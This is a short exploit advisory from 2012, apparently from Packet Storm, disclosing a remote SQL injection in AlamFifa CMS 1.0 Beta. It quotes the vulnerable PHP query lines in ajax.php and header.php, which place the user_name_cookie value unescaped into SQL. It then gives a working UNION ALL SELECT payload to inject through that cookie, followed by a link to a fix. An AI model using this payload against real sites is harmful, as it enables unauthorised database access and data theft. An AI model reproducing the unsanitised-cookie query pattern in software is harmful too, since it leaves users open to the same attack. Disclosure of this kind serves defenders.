AlamFifa CMS version 1.0 Beta suffers from a remote SQL injection vulnerability.
6f1f0aa2b174b5972be5d9d14ec22b93f2ffbfd0437fdffaabeef43d8ceb5a95############################################
### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability
### Date: 30/9/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/
### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip
### Version: 1.0
### Tested on: Linux/Windows
############################################
# Files affected :
- ( ajax.php ) on line 6:
$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));
- ( /files/header.php ) on line 34 :
$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));
# user_name_cookie is affected in cookie ..
# P.0.C :
http://127.0.0.1/alamfifa1/index.php
- Inject the cookie by any tool like this :
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
############################################
# You can fix it here :
http://www.traidnt.net/vb/traidnt2143253-2/#post19292739
# Greetz to my friendz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed